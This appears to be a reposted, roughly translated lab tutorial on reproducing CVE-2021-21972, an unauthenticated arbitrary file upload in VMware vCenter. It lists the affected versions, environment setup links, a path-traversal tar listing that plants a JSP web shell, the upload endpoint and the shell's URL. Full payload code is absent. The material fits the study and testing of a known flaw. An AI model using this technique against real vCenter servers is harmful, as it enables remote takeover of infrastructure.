How to reproduce CVE-2021-21972 when uploading arbitrary files without authorization from Vmware vcenter 04/05 Update SLTechnology News&Howtos

How to reproduce CVE-2021-21972 when uploading arbitrary files without authorization from Vmware vcenter

2025-04-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article is about how to achieve Vmware vcenter unauthorized arbitrary file upload CVE-2021-21972 reproduction, the editor feels very practical, so share with you to learn, I hope you can get something after reading this article, say no more, follow the editor to have a look.

Vmware vcenter does not authorize any file upload (CVE-2021-21972)

I. brief introduction of loopholes

VMware is a cloud infrastructure and mobile commerce solution vendor that provides VMware-based virtualization solutions.

High-risk serious vulnerabilities:

In the CVE-2021-21972 VMware vCenter Server remote code vulnerability, an attacker can construct a malicious request directly through port 443, execute arbitrary code, and control vCenter.

The vulnerability is arbitrary file upload:

The interface with the problem is

/ ui/vropspluginui/rest/services/uploadova

Complete path

(https://ip:port/ui/vropspluginui/rest/services/uploadova) II. Influence version

VMware vCenter Server 7.0Series

< 7.0.U1c VMware vCenter Server 6.7系列 < 6.7.U3l VMware vCenter Server 6.5系列 < 6.5 U3n VMware ESXi 7.0系列 < ESXi70U1c-17325551 VMware ESXi 6.7系列 < ESXi670-202102401-SG VMware ESXi 6.5系列 < ESXi650-202102101-SG 三、环境准备&漏洞复现安装EXSI 7.0.0 VMware vSphere虚拟机监控程序（ESXi）链接：https://cld16.irans3.com/dlir-s3/VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso档案大小：350 MB MD5：220d2e87290f50c3508214cadf66b737 SHA1：7fda0401ee1b2f49aae89043f9b2d509cf7e25db 安装：https://blog.51cto.com/10802692/2409826 下载 vCenter Server VMware vCenter Server 链接：https://cld5.irans3.com/dlir-s3/VMware-VCSA-all-7.0.0-15952498.iso VMware-VCSA-all-7.0.0-15952498.iso档案大小：6.42 GB MD5：94bb30ae83cd5f12e2eecce114d43007 SHA1：17aa2b1ee20e977fb4f8f8391563f57c3e456361 安装：https://blog.csdn.net/qq_38028248/article/details/107712839 （环境安装参考来源：作者: print("")师傅环境部署） midi.tar（后台回复："vmware"）获取

.. /.. / usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h6ngc.war/resources/0000755000000000000000000000000014015431210027145 5ustar rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h6ngc.war/resources/shell.jsp0000644000000000000000000000117114015430711030777 0ustar rootroot

Https://ip:port/ui/vropspluginui/rest/services/uploadova

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36

Return sucess to prove that the upload of tar is successful

Access the shell address:

Https://127.0.0.1/ui/resources/shell.jsp

Connect Trojan shell:

Related command execution:

The above is how to achieve Vmware vcenter unauthorized arbitrary file upload CVE-2021-21972 reproduction, the editor believes that there are some knowledge points may be seen or used in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.